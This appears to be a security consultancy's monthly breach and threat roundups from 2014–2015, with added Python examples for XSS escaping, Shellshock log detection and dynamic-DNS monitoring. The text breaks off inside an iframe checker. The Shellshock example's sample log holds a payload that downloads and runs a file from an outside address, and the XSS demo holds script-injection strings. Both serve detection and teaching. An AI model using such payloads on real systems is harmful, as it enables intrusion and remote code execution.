A hacker going by the handle of Kuroi'SH defaces the Google Vanuatu domain (google.vu) in support of the freedom of Western Sahara. (16)
References:
- http://arstechnica.com/tech-policy/2015/06/hack-of-opm-reportedly-exposed-second-set-of-much-more-sensitive-data/
- http://arstechnica.com/security/2015/06/epic-fail-how-opm-hackers-tapped-the-mother-lode-of-espionage-data/
- https://www.hackread.com/anonghost-palestine-hackers-sheriff-website/
- http://www.databreaches.net/bae-systems-first-notifying-employees-of-extranet-site-network-attack-in-2014/
- http://motherboard.vice.com/read/hacker-dumps-up-to-23000-government-emails-on-the-dark-web
- http://researchcenter.paloaltonetworks.com/2015/06/operation-lotus-blossom/
- http://www.zdnet.com/article/canada-government-websites-offline-amid-ongoing-cyberattack/
- https://www.recordedfuture.com/government-credentials-report/
- http://www.newsbtc.com/2015/06/22/scrypt-cc-hacked-large-amount-of-bitcoin-stolen/
- http://www.scmagazine.com/aerogrow-says-malware-likely-compromised-payment-card-data/article/419227/
- http://www.scmagazine.com/mario-batalis-eately-compromised-in-cyber-attack/article/419082/
- http://krebsonsecurity.com/2015/06/discount-chain-freds-inc-probes-card-breach/
- http://pastebin.com/bU2EVAgy
- http://pastebin.com/JtCxfY98
- http://pastebin.com/pDKVcU2Z
- https://www.hackread.com/google-vanuatu-domain-hacked/
The last two-week period of May will be noted for massive breaches, starting with Pacnet (number of victims unknown) and continuing throughout the month with CareFirst BlueCross BlueShield (1.1 million victims), AdultFriendFinder (4 million), the Internal Revenue Service (100,000), the music streaming portal Gaana.com (7.5 million) and, last but not least, Japan's universal public pension system (1.25 million), with a resulting damage report exceeding 10 million compromised individuals. (1)
Government, Education, Defence and Allied Sectors:
Approximately 1.25 million personal records were compromised by hackers in a recent targeted attack, confirmed the organization that manages Japan's universal public pension system. The hackers succeeded in compromising the names and pension numbers of 31,000 people, as well as the names, pension numbers and birth dates of an additional 1.25 million people. The names, pension numbers, birth dates and home addresses of another 50,000 were also leaked, the Japan Pension Service stated. The attack, which was first discovered by the organization on May 28, allegedly occurred as a result of an employee opening an email infected with a computer virus. (2)
Elsewhere, in Germany, there has been an attack on the IT systems of the Bundestag. Experts from the Bundestag administration and the Government Office for Information Technology Security (BSI) are working to fend off the hackers, the official spokesperson said. (3)
A security breach of the Singapore Ministry of Foreign Affairs (MFA) IT system last year was one of the more serious and advanced attacks against the Government's IT networks. After it was detected, steps were taken immediately to isolate the affected devices, and security measures were implemented to strengthen the networks. (4)
Penn State’s College of Engineering has been disconnected from the Internet so it can recover from two serious computer intrusions that exposed personal information for at least 18,000 people and possibly other sensitive data, officials said. The group responsible for one of the attacks appears to be based in China. (5)
The online hacktivist Anonymous breached the official websites of the Thailand Senate and the Public Health Ministry, leaking login credentials in protest against the country's alleged support for human trafficking. The websites were targeted for showing no interest in stopping human traffickers operating from the country, whose victims include children, especially girls who are later forced into prostitution. (7)
Banking, Finance and Allied Sectors:
Michigan-based Retail Capital is notifying more than 700 individuals that unauthorized access was gained to the electronic mailbox of a sales manager, and personal information may have been compromised. The incident occurred on March 17. Unauthorized access was gained to the electronic mailbox for approximately 40 minutes, during which time the sales manager was locked out. The mailbox contained funding applications and related information provided by applicants in support of their applications. (6)
Bitfinex announced that although it keeps over 99.5% of users' BTC deposits in secure multisig wallets, the small remaining amount of coins in its hot wallet was theoretically vulnerable to attack. Bitfinex believes that its hot wallet keys might have been compromised and has asked all of its customers to stop depositing cryptocurrency to old deposit addresses. (8)
A computer hacker apparently stole USD 250,000 from International Grand Investment Corporation, the parent company of Cascade Pacific Pulp in Halsey. The money was wired to what appears to be a business in China, but investigators aren’t sure if the company is real or not. (9)
E-commerce, Online Services and Allied Sectors:
Domain registrar eNom informed its customers on Thursday that it was the victim of a group of attackers who altered the domain name system (DNS) settings of four domains, redirecting traffic to web resources other than those intended by the owners. (10)
Online services website ottawaliving.ca was breached by @TorProdigy; 13,000 names, emails and passwords were compromised. (11)
The hacker Rubber attacks wowfon.com and steals over 7,000 usernames and passwords. (12)
More than 100,000 online Betty's customers have had their personal details accessed following a data breach. Bettys.co.uk issued an email to all 120,000 of the online customers in its website database today, informing them that the site had been affected by a data breach. The breach occurred following an industry-wide software weakness which allowed someone to illegally gain access to personal customer data. (13)
It seems Six Continents Hotels (InterContinental Hotels Group) was notified earlier this year by the Secret Service that some of its hotels had suffered a data security breach. One of the hotels IHG subsequently notified was Cities Service (Holiday Inn Express & Suites in Sulphur, Louisiana); IHG alerted them on February 11, 2015. When Cities Service investigated, it found that a malicious email attachment had compromised its payment system and exposed 613 customers' names, addresses, payment card numbers and expiration dates. (14)
In India, a hacker group by the name of Team Unknown has claimed that it successfully hacked into OlaCabs and gained access to sensitive information such as credit card history, vouchers and user behaviour. Ola has denied these claims. According to the post, which was shared on Reddit, the hackers put out screenshots showing credit cards and voucher codes, and claimed that OlaCabs' "application design is very poor and their development server is weakly configured", which is what made the hack successful. (15)
References:
- http://hackmageddon.com/2015/06/08/may-2015-cyber-attacks-statistics/
- http://www.tripwire.com/state-of-security/latest-security-news/hackers-steal-over-a-million-japanese-citizens-personal-data-in-targeted-attack/
- http://www.thelocal.de/20150515/hacker-attack-targets-bundestag-data
- http://news.asiaone.com/news/singapore/govts-it-networks-beefed-after-attack#sthash.5ls5DzVb.dpuf
- http://arstechnica.com/security/2015/05/penn-state-severs-engineering-network-after-incredibly-serious-intrusion/
- http://www.scmagazine.com/retail-capital-notifies-hundreds-following-security-incident/article/413042/
- https://www.hackread.com/anonymous-breaches-thailand-senate-website/
- https://www.bitfinex.com/pages/announcements/?id=35
- http://democratherald.com/news/local/hacker-steals-from-company/article_1766668e-59dc-5169-a1cf-62384d720d3b.html
- http://news.softpedia.com/news/Domain-Registrar-eNom-Informs-of-DNS-Hijack-Attack-481867.shtml
- http://pastebin.com/0Tmy0hm1
- http://siph0n.net/exploits.php?id=3824
- http://www.harrogateadvertiser.co.uk/news/crime/thousands-of-customers-details-accessed-following-bettys-data-breach-1-7266657
- http://www.databreaches.net/intercontinental-hotel-groups-alerted-by-secret-service-to-breach/
- http://www.databreaches.net/in-olacabs-hacked-credit-card-info-accessed-company-denies-data-breach
April 2015 brought cyberattacks along three major tracks: Government and Defense, Banking and Allied Sectors, and the E-commerce/Services sector. We are adding Education alongside Government and Defense, as a sizeable number of individuals were impacted by attacks on universities in April.
Government, Defense and Education:
Hackers traced back to Islamist sources attacked the website uk-air.defra.gov.uk, run by the British Government's Department of Environment, Food & Rural Affairs (DEFRA). The UK authorities are now trying to work out preventive mechanisms to avoid a similar situation on another 3,500 UK Government websites. (1)
Investigators apparently believe that hackers accessed the White House network by first hacking the State Department via a spear phishing email – a focused scam to gain information from a specific individual. (2)
As described earlier, there were a lot of instances of data breaches at universities in April; here are some of them. Dates of birth, home addresses, phone numbers, grade point averages and other personal information of 160,000 Metropolitan State University (Minnesota) students have been exposed in a data breach after a hacker broke into the database. (3)
Auburn University also suffered a data breach, with similar information on 364,012 people made openly accessible online from September 2014 until March 2, 2015. (4)
The University of California, Riverside (UC Riverside) has notified about 8,000 current and former graduate students, graduate applicants and other related individuals that their personal information was on a desktop computer that was stolen during a break-in. (5)
The 7th of April was also an important date for hacktivists all around the world. Each year on this day, they unite their efforts against a single target, Israel, which becomes the victim of the so-called OpIsrael. As usual this happened punctually, but just like last year the damage was marginal. (13)
Banking and Allied Sectors:
There is a report that the Dyre Wolf Trojan has been used in phishing attacks, bypassing two-factor authentication, with more than $1 million transferred out of bank accounts. (6) Meanwhile, an undisclosed number of current and former mortgage customers of HSBC Finance Corp. in the U.S. are being notified that their personal information was inadvertently made publicly accessible on the internet. (7)
E-commerce and Services:
The most illustrious victim is Lufthansa, whose frequent-flyers website has been hacked, with the attackers able to harvest miles from the unaware victims. (13)
NiteIze is notifying customers that its online store experienced a cyber-attack, which resulted in credit card transactions being compromised and unauthorized access possibly being gained to a general customer database. The attack happened in early March and about 300 transactions were identified. All users have been notified and further steps taken. (8)
A malware attack hit the point-of-sale systems of 10 hotels run by the hotel management firm White Lodging Services Corp. Customer data at risk includes names, payment card numbers, card security codes and expiration dates. (9)
A critical security flaw in eBay’s Magento e-commerce platform has been made public. Although a patch (SUPEE-5344) for the vulnerability was released in February, it is thought that up to 200,000 e-commerce sites are still vulnerable to attack because their owners have not applied it.(12)
Vulnerable WordPress websites can be exploited via XSS to steal user accounts, change settings or phish passwords from unsuspecting users. In fact, XSS flaws are one of the most commonly encountered security flaws found on websites. (11)
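The XSS item above is worth illustrating with working code. The following Python snippet is an added example, not code from this newsletter, from WordPress or from any plugin: it renders an untrusted comment first without and then with output encoding, shows why escaping alone is not enough inside an href attribute, and checks which rendering leaves live markup behind. The sample comments, the `render_comment_*` and `safe_href` helpers and the `audit` function are all constructed for the example.

```python
"""Added example (not part of the original newsletter): untrusted text rendered
into HTML with and without output encoding, the standard mitigation for the
stored/reflected XSS flaws mentioned above. Every name here is constructed for
the illustration; none comes from WordPress or any plugin."""
import html
import re
from urllib.parse import urlparse

# Constructed sample comments: one benign, two carrying markup a browser would act on.
SAMPLE_COMMENTS = [
    "Great post, thanks!",
    "<script>alert(1)</script>",
    '<img src=x onerror="alert(1)">',
]


def render_comment_vulnerable(comment: str) -> str:
    """Interpolates untrusted text directly into the page. Any tag in the
    comment becomes live markup: this is the XSS pattern."""
    return f'<div class="comment">{comment}</div>'


def render_comment_safe(comment: str) -> str:
    """Encodes &, <, >, double and single quotes before interpolation, so the
    browser shows the characters as text instead of parsing them as markup."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


def safe_href(url: str) -> str:
    """Escaping alone is not enough inside an href attribute: a 'javascript:'
    URL survives html.escape untouched. Allow-list the scheme first, then
    escape for the attribute context."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


# Any tag other than the wrapper <div> in the rendered fragment means the
# comment's markup went live. Crude, but enough to compare the two renderers.
_TAG_RE = re.compile(r"<\s*[a-zA-Z][^>]*>")


def contains_live_markup(rendered: str) -> bool:
    tags = _TAG_RE.findall(rendered)
    return any(not t.lower().startswith("<div") for t in tags)


def audit(comments=SAMPLE_COMMENTS) -> dict:
    """Counts how many sample comments end up as live markup under each renderer."""
    return {
        "vulnerable": sum(contains_live_markup(render_comment_vulnerable(c)) for c in comments),
        "safe": sum(contains_live_markup(render_comment_safe(c)) for c in comments),
    }


if __name__ == "__main__":
    for c in SAMPLE_COMMENTS:
        print("vulnerable:", render_comment_vulnerable(c))
        print("safe:      ", render_comment_safe(c))
    print(audit())
```

The point to take from the `audit` result is that the encoding has to happen at output time and per context: `html.escape` is right for element text and quoted attribute values, while URL-bearing attributes additionally need a scheme allow-list, which is what `safe_href` does.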
Two iOS vulnerabilities allow attackers to force a constant cycle of reboots on any iOS device within range of a specially configured router, rendering all nearby iPhones and iPads useless. (10)
References:
- http://www.hotforsecurity.com/blog/uk-government-website-hijacked-by-islamist-hackers-11676.html
- http://www.itgovernanceusa.com/blog/russian-hackers-accessed-president-obamas-emails/
- http://www.itgovernanceusa.com/blog/160000-students-compromised-in-metropolitan-state-university-data-breach/
- http://www.scmagazine.com/uc-riverside-computer-stolen-contained-data-on-about-8000-students/article/408010/
- http://www.scmagazine.com/data-at-risk-for-9000-individuals-following-unauthorized-access-to-sri-inc-website/article/409793/
- https://portal.sec.ibm.com/mss/html/en_US/support_resources/pdf/Dyre_Wolf_MSS_Threat_Report.pdf
- http://www.scmagazine.com/hsbc-mortgage-customer-info-was-publicly-accessible-on-the-internet/article/409758/
- http://www.scmagazine.com/nite-ize-website-attack-impacts-credit-cards-possibly-customer-database/article/406835/
- http://www.itgovernanceusa.com/blog/hotel-company-announces-second-data-breach/
- http://www.itgovernanceusa.com/blog/no-ios-zone-wi-fi-attack-can-incapacitate-any-iphone-or-ipad/
- http://blog.lumension.com/10033/popular-wordpress-plugins-found-vulnerable-to-xss-attacks/
- http://www.itgovernance.co.uk/blog/massive-vulnerability-affects-up-to-200000-ebay-stores/
- http://hackmageddon.com/2015/04/20/1-15-april-2015-cyber-attacks-timeline/
We are continuing our coverage of various attacks that happened across the globe. We have tried to classify based on three major sector groups for the reader’s benefit.
Government and Defence:
Bitcoin Baron, a hacker who seems to target government sites, was active this month, taking down the cityofmoore.com (City of Moore, Oklahoma) website and demanding 100 bitcoins to protect data that Bitcoin Baron claims to have acquired. (1)
State and International Institutions faced attacks from activists on specific causes – Istanbul Police Administration being attacked by Turkish activists and US State Department cleaning up after an early March attack by Russian Hackers.(2)
Banking, Insurance and Allied Sectors:
The investigation of Premera's IT systems has created a panic in the healthcare insurance sector; updates on the Premera attack are available at the enclosed link. Premera Blue Cross, Premera Blue Cross Blue Shield of Alaska, and the affiliate brands Vivacity and Connexion Insurance Solutions, Inc. were affected. With the help of Mandiant, the investigation determined that the attackers may have gained unauthorized access to applicants' and members' information; efforts to fix and upgrade all systems are underway. (3)
Phishing attacks targeting Bank of America customers have been reported. Christopher Boyd of Malwarebytes notes that the "second site which asks for the bulk of the banking customer information is being flagged by Chrome for phishing, so hopefully that will help to reduce the potential victim pool still further." Users are warned to be wary of suspicious requests or notifications. (8)
Meanwhile, Kreditech, a German "consumer finance startup that specializes in lending to 'unbanked' consumers with little or no credit rating", has suffered a data breach, resulting in the exposure of thousands of loan applicants' personal and financial records, including scanned passports, drivers' licenses, IDs and credit agreements. This is a general word of caution on the data storage practices of startups handling financial data. (9)
E-Commerce, Services and Online Businesses:
As recently as March 27th, GitHub, the code sharing and software project collaboration website, was hit by a large-scale DDoS attack, apparently emanating from China, that periodically caused service outages. The attack appears to hijack HTTP traffic from Baidu, a major Chinese Internet provider, and send it to GitHub URLs. (4)
In a possible case of online data theft, Lakewood, Colo.-based Natural Grocers said it has hired a third-party data forensics firm to investigate a possible case of customer credit and debit card fraud. While its investigation is ongoing, the company has accelerated plans to upgrade the point-of-sale systems in all of its store locations with a new PCI-compliant system that provides point-to-point encryption and new PIN pads that accept secure "chip and PIN" cards. (5)
In a minor but worrying hacking incident, an employee email account at the third-party service provider of Sacred Heart Health System's billing information system was hacked. The hackers gained access to patients' details, medical diagnoses and treatments, billing information and some Social Security numbers (SSNs). The employee email account of the third-party vendor was accessed through a phishing attack, Sacred Heart said. (6)
While an Uber spokesperson denied a data breach, some sources report that Uber accounts are being sold for $1. Thousands of user details are available on 'dark websites', according to this source. (7)
Saltwater aquarium supplies seller Bulk Reef Supply announced that its website was compromised for about six months, and the company is notifying an undisclosed number of customers that their personal data – including credit card information – could be at risk. ( 10)
Credit card data loss is a major issue with retail outlets, and hopefully there will be action on reporting and precautionary measures.
References:
- http://www.databreaches.net/bitcoin-baron-tells-moore-oklahoma-thanks-for-letting-me-into-your-system-now-pay-me/
- http://www.cnet.com/news/state-department-takes-network-offline-for-security-scrub/
- http://premeraupdate.com/
- https://threatpost.com/github-hit-with-ddos-attack/111850#sthash.ZPKIxi3u.dpuf
- https://krebsonsecurity.com/2015/03/natural-grocers-investigating-card-breach/
- http://www.pnj.com/story/news/2015/03/16/sacred-heart-health-system-billing-information-hacked/24859975/
- http://motherboard.vice.com/read/stolen-uber-customer-accounts-are-for-sale-on-the-dark-web-for-1
- http://www.itgovernanceusa.com/blog/bank-of-america-phishing-scam-alert/
- http://www.itgovernance.eu/blog/unbanked-lender-kreditech-suffers-insider-data-breach/
- http://www.scmagazine.com/bulk-reef-supply-website-compromised-credit-cards-at-risk/article/400727/
From the archives:
About SecurBay:
SecurBay (https://www.securbay.com) is a boutique Information Security and Consulting services firm that helps corporations in dealing with emerging threats. Head-quartered in Mumbai, India; SecurBay offers Threat Assessment, Intelligence, and Protection services for businesses that have adopted cloud, mobile and social media platforms. SecurBay is focussed on defending threats that affect the client’s business, thereby reducing the risk of security breaches. SecurBay’s approach is to provide customized, context-driven inputs and actionable advice. SecurBay has clients across India, Asia Pacific, Middle East and USA regions.
February 2015 has been a month of various attacks across the world. The attacks fall under three buckets: government and defence agencies, commercial organizations, and businesses.
Government and Defence:
It is becoming clear that government and defence establishments are always under attack, and this February was no exception. The Midlothian Police Department had to pay a hacker $500 in bitcoin to regain access to its systems. The attack was mounted using ransomware called Cryptolocker, embedded in an infected email that was inadvertently downloaded by the police. A lack of awareness of the anti-virus policies established after a 2013 Cryptolocker attack seems to have been the root cause.
The DCMA took some of its online servers offline after a few of them appeared to have been affected by a data breach. An attack is suspected, and an investigation is under way. The affected systems were Internet-facing servers.
(Source: http://krebsonsecurity.com/2015/02/defense-contract-management-agency-probes-hack/)
The EU suffered the most in a recent spate of attacks. Even Russian government sites were not spared. A number of the Dutch government's main websites went offline for seven hours in the second week of February, disabled by a sustained Distributed Denial-of-Service attack. The attack disabled websites that share information with the public and the media, and the backup plans to get the servers back online failed.
Similarly, in January, a group of attackers called 'Cyber-Berkut' took down the website for more than a week; this was the first successful Advanced Persistent Threat attack ever. Even the backup measures of the German government failed to counter the hack, which was successful.
(Source: http://www.itgovernance.eu/blog/dutch-government-websites-hacked/)
Banking:
The banking establishment, another crucial sector, came under DDoS attack. Denial-of-service attacks aim at disrupting online banking services, thereby affecting transactions, customer service and the bank's reputation. In one case, on New Year's Eve, a DDoS attack flooded Finnish bank OP Pohjola Group's data communications systems and prevented customers' ATM withdrawals and, in some cases, card payments. The Finnish branch of Nordea Bank and Denmark's Danske Bank have also suffered online disruptions in the recent past.
(Source: http://www.itgovernance.eu/blog/finnish-bank-hit-with-ddos-attack/)
In addition, a Kaspersky Lab report described a $300 million theft by criminals who mimicked employee behaviour to make the transactions look like business as usual. Banks in the US, Europe, Japan and Russia were affected, but none of the banks have reported the breach.
(Source: http://www.itgovernanceusa.com/blog/global-banks-breached-in-largest-ever-heist/)
Online Businesses, E-commerce and Services:
Most online businesses regularly come under attack. In February, Jamie Oliver's website was hacked to serve up malware via the Fiesta exploit kit, which had recently integrated a Flash Player exploit. While updates are available, most people update slowly, so the vulnerability still remains.
(Source: http://www.itgovernance.co.uk/blog/jamie-oliver-website-hacked-to-serve-up-malware/)
While many companies are still coming to grips with alternative currencies such as Bitcoin, the Canadian Bitcoin exchange Cavirtex has announced that it is shutting down after attackers compromised its systems and stole hashed passwords and two-factor authentication secrets. Cavirtex says customers' money is safe and intact, but it considers its reputation compromised and is therefore closing.
(Source:https://grahamcluley.com/2015/02/bitcoin-exchange-shuts-down/)
About SecurBay:
SecurBay (https://www.securbay.com) is a boutique information security and consulting services firm that helps corporations deal with emerging threats. Headquartered in Mumbai, India, SecurBay offers threat assessment, intelligence and protection services for businesses that have adopted cloud, mobile and social media platforms. SecurBay is focused on defending against the threats that affect the client's business, thereby reducing the risk of security breaches. SecurBay's approach is to provide customized, context-driven inputs and actionable advice. SecurBay has clients across India, Asia Pacific, the Middle East and the USA.
Towards the end of September 2014, a new vulnerability was discovered in Bash, the shell used on Linux and Mac operating systems, raising concerns about an exploit that appears to be more damaging than the Heartbleed bug identified earlier this year. Where Heartbleed exposed passwords and other sensitive data to attackers, the Bash bug lets an outsider take control of the affected device to install programs or run commands. Apart from the Bash bug, attacks on healthcare providers are on the rise, and attacks on point-of-sale (POS) systems continue to grow because EMV adoption remains slow.
1. ShellShock: All you need to know about the Bash Bug Vulnerability
Bash, a common component also known as a shell, appears in many versions of Linux and Unix and acts as a command language interpreter: it lets the user type commands into a simple text-based window, which the operating system then runs.
The CVE reference for the Bash bug in the NIST vulnerability database is CVE-2014-6271, rated 10 out of 10 for severity. This is compounded by the fact that the attack is easy to execute (access complexity is low) and, most significantly, no authentication is required when exploiting Bash via CGI scripts. The consequences of successfully exploiting this vulnerability on a web server are very serious: for example, attackers may be able to dump password files or download malware onto the affected machine.
While the vulnerability potentially affects any computer that runs Bash, a remote attacker can exploit it only in certain circumstances. For a successful attack, the attacker needs to force an application to pass a malicious environment variable to Bash; web servers that hand request headers to CGI scripts are the most common case. Linux vendors have issued security advisories, including patching information, for the newly discovered vulnerability. If a patch is not yet available for a specific distribution of Linux or Unix, users are advised to switch to an alternative shell until one becomes available.
(Source:http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability)
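The CGI vector described above, as an added example for this advisory (not code from Symantec, the Bash project or SecurBay): it shows how a CGI server copies request headers into environment variables, scans web-server log lines for the `() { :;};` function-definition signature, and runs the canonical local Bash test. The Apache combined log format, the header names and the two log lines are assumptions constructed for the example, not real traffic.

```python
"""Shellshock (CVE-2014-6271) helpers: a local Bash check and a detector for
exploitation attempts in web-server logs.

Added example for this advisory; not code from Symantec or the Bash project.
Assumptions: log lines are in Apache "combined" format and the payload is
carried in the User-Agent header, the most common CGI vector.
"""
import re
import subprocess

# A Shellshock payload is a Bash function definition followed by trailing
# commands, e.g.  () { :;}; /bin/bash -c 'id'
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache combined log format; the last two quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def cgi_env_from_headers(headers):
    """Why the bug is remotely reachable: a CGI web server exports every
    request header into the child's environment as HTTP_<NAME> (RFC 3875),
    so a Bash CGI script imports an attacker-controlled header as a function
    definition, and a vulnerable Bash runs the trailing commands, on startup."""
    return {"HTTP_" + name.upper().replace("-", "_"): value
            for name, value in headers.items()}


def find_shellshock_attempts(log_text):
    """Return (client_ip, field, payload) for each log line whose request
    line, Referer or User-Agent carries a Shellshock function definition."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED_RE.match(line)
        if not m:
            continue
        for field in ("ua", "ref", "req"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append((m.group("ip"), field, m.group(field)))
                break
    return hits


def local_bash_is_vulnerable(bash="bash"):
    """Canonical CVE-2014-6271 test: a patched Bash prints only 'test'; a
    vulnerable one also executes the trailing 'echo vulnerable'.
    Returns None when Bash cannot be run at all."""
    env = {"PATH": "/usr/bin:/bin", "x": "() { :;}; echo vulnerable"}
    try:
        out = subprocess.run([bash, "-c", "echo test"], env=env,
                             capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.TimeoutExpired):
        return None
    return "vulnerable" in out.stdout


# Constructed sample log (not real traffic): one probe via User-Agent, one benign hit.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.7/x -O /tmp/x; sh /tmp/x'"
198.51.100.23 - - [25/Sep/2014:10:12:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/32.0"
"""

if __name__ == "__main__":
    for ip, field, payload in find_shellshock_attempts(SAMPLE_LOG):
        print(f"Shellshock probe from {ip} in {field}: {payload}")
    print("local bash vulnerable:", local_bash_is_vulnerable())
```

The local check covers only the original CVE-2014-6271 test string; the first patch was incomplete (CVE-2014-7169), so a fully patched system should also be verified against that follow-up. The log scan catches the common probe shape, not every obfuscated variant, and should be treated as one signal among others.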
2. Massively distributed Citadel Malware targets Middle Eastern Petrochemical Organizations
In a Citadel-based attack, the malware watches for specific webmail URLs of the targeted firms and intercepts the infected user's HTTP POST data, including the webmail login credentials. This gives the attackers instant insider access to the target. The targets of this attack include one of the largest sellers of petrochemical products in the Middle East and a regional supplier of raw petrochemical materials.
IBM Trusteer research found that, on average, 1 in 500 machines worldwide is infected with massively distributed APT malware at any point in time. Citadel, which was built for stealing banking credentials, typically through man-in-the-browser attacks, is no longer supported or upgraded by its author. The malware is built to avoid antivirus detection and is tested against online scanners such as Scan4You, an equivalent of the popular VirusTotal except that it is anonymous and does not share uploaded samples with antivirus vendors. Once installed on the victim's machine, the malware blocks access to security vendors' websites. It is best to avoid infection in the first place by using an anti-malware solution that constantly protects the computer by blocking malicious sites and files.
3. Florida Medical Center hit with breach for third time in two years
Aventura Hospital and Medical Center has reported a data breach, the third time in two years that the facility has been hit. The personal information of more than 82,000 people is at risk of exposure, according to U.S. Health and Human Services records, owing to a breach between Sept. 13, 2012 and June 9, 2014 at the Florida-based medical center.
Number of affected records: 82,601
Type of personal information exposed: names, dates of birth and Social Security numbers.
No personal financial or health information was accessed, according to Valesco Ventures, which provides hospital staffing and ancillary services to the medical center and notified Aventura of the incident. Fraudsters typically use such data to create fake IDs in order to buy medical equipment or drugs that can be resold, or combine a patient number with a false provider number and file made-up claims with insurers, according to experts who have investigated cyber-attacks on healthcare organizations. Stolen health credentials can sell for $10 each, about 10 to 20 times the value of a U.S. credit card number. Security has been an afterthought for many medical providers; outdated software, lack of awareness and reliance on legacy systems are the primary reasons such attacks are so widespread.
(Source:http://www.reuters.com/article/2014/09/24/us-cybersecurity-hospitals-idUSKCN0HJ21I20140924)
Subscribe to our Monthly Threat Advisory Report, via our contact-us form, for complete information on top threats with analysis, data breaches, security news and much more.
After analyzing malicious traffic from its customers' networks, Cisco determined that roughly 94 percent of them had issued DNS requests for hostnames resolving to IP addresses associated with the distribution of malware that incorporates man-in-the-browser (MitB) functionality, such as Zeus, Palevo and SpyEye.
Cisco also found that close to 70 percent of its customers had issued DNS queries for Dynamic DNS (DDNS) domains. DDNS is normally used for legitimate purposes, typically by home users who need to map a fixed fully qualified domain name (FQDN), for example homeserver.isp.com, to an IP address that their Internet service provider (ISP) assigns dynamically and may change at any time.
Unfortunately DDNS, like many technologies developed for legitimate use, has become popular with adversaries because it lets botnets and other attack infrastructure change IP addresses quickly and so resist detection and takedown. Organisations should look closely at the DDNS requests leaving their networks to make sure they are being sent for legitimate business reasons.
(Source: Cisco 2014 Midyear Security Report)
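One way to act on the DDNS recommendation above, as an added example for this advisory (not code from Cisco or SecurBay): a small filter that reads resolver query-log lines, flags queries for hostnames under known dynamic-DNS zones, and skips hostnames the business has explicitly allowlisted. The BIND-style log format, the zone list and the allowlist entry are assumptions; the four log lines are constructed, not captured traffic.

```python
"""Flag DNS queries to dynamic-DNS providers in a resolver query log.

Added example for this advisory, not from the Cisco report. Assumptions:
the log lines follow BIND's query-log format; the provider zones below are
well-known examples and should be extended from your own traffic; the
allowlist is a placeholder for hostnames your business legitimately uses.
"""
import re
from collections import defaultdict

# Second-level zones used by popular free dynamic-DNS services (illustrative,
# not complete).
DDNS_ZONES = {
    "no-ip.com", "no-ip.org", "ddns.net", "hopto.org", "zapto.org",
    "dyndns.org", "dyndns.info", "duckdns.org", "3322.org", "changeip.com",
}

# Hostnames the business knowingly uses on a DDNS service (assumed value).
ALLOWLIST = {"vpn.homeoffice.no-ip.org"}

# BIND query-log line, e.g.
# 12-Aug-2014 09:15:22.123 client 10.0.0.15#53211: query: evil.ddns.net IN A + (10.0.0.2)
QUERY_RE = re.compile(
    r"client (?P<src>[\d.:a-fA-F]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def ddns_zone(qname):
    """Return the DDNS zone that qname falls under, or None.
    Walks the name from the left so that any.depth.of.labels.ddns.net matches."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in DDNS_ZONES:
            return candidate
    return None


def flag_ddns_queries(log_text):
    """Return {client_ip: [qname, ...]} for DDNS queries that are not allowlisted."""
    flagged = defaultdict(list)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".").lower()
        if qname in ALLOWLIST:
            continue
        if ddns_zone(qname):
            flagged[m.group("src")].append(qname)
    return dict(flagged)


# Constructed sample log (not real traffic).
SAMPLE_QUERY_LOG = """\
12-Aug-2014 09:15:22.123 client 10.0.0.15#53211: query: update.evil-c2.ddns.net IN A + (10.0.0.2)
12-Aug-2014 09:15:23.001 client 10.0.0.15#53212: query: www.example.com IN A + (10.0.0.2)
12-Aug-2014 09:15:40.777 client 10.0.0.42#40001: query: vpn.homeoffice.no-ip.org IN A + (10.0.0.2)
12-Aug-2014 09:16:02.456 client 10.0.0.77#51000: query: c2node.hopto.org IN A + (10.0.0.2)
"""

if __name__ == "__main__":
    for client, names in flag_ddns_queries(SAMPLE_QUERY_LOG).items():
        print(f"{client}: DDNS queries for {', '.join(names)}")
```

A hit is a lead, not a verdict: DDNS is also used legitimately, which is exactly why an allowlist of known-good hostnames is kept alongside the zone list. In practice the zone list should be fed from threat intelligence rather than maintained by hand.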
WordPress Vulnerabilities allow attackers gain access to corporate sites
Almost 19 percent of the web runs on WordPress: it powers 66 million websites and served about 4 billion page views a month in 2013, which makes it a natural target for attackers. Most WordPress users do not have the knowledge or skills to secure it properly, and quite often users who set up a website with the WordPress content management system (CMS), or a similar system, abandon it in due course.
Attackers who breach these long-forgotten sites can upload malicious binaries and use the sites as exploit delivery points. Users encounter them by browsing other active, legitimate websites that have also been compromised: an injected iframe pulls content from the abandoned site and serves it to visitors of the legitimate one. SecurBay recommends keeping the WordPress core and plugins up to date, protecting the WordPress admin area by not using the default "admin" user name, and requiring strong passwords together with two-factor authentication.
Many leading hosting providers now offer low-cost managed WordPress installation for commercial websites as part of their hosting packages; the provider makes sure that patches are applied and the correct security settings are in place. As more site owners use this kind of service, the number of sites with exploitable WordPress vulnerabilities should fall.
(Source: Cisco 2014 Midyear Security Report)
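The injected-iframe technique described above, as an added example for this advisory (not code from Cisco, WordPress or SecurBay): a check that parses a page's HTML and flags iframes that are both off-site and hidden, which is the shape the exploit-delivery frames typically take. The site domain, the hidden-style patterns and the sample HTML are assumptions constructed for the example.

```python
"""Find hidden, off-site iframes of the kind injected into compromised pages
to pull exploit-kit content from an abandoned site.

Added example for this advisory, not from the Cisco report or WordPress.
Assumptions: the caller supplies the hosting site's own domain; "hidden"
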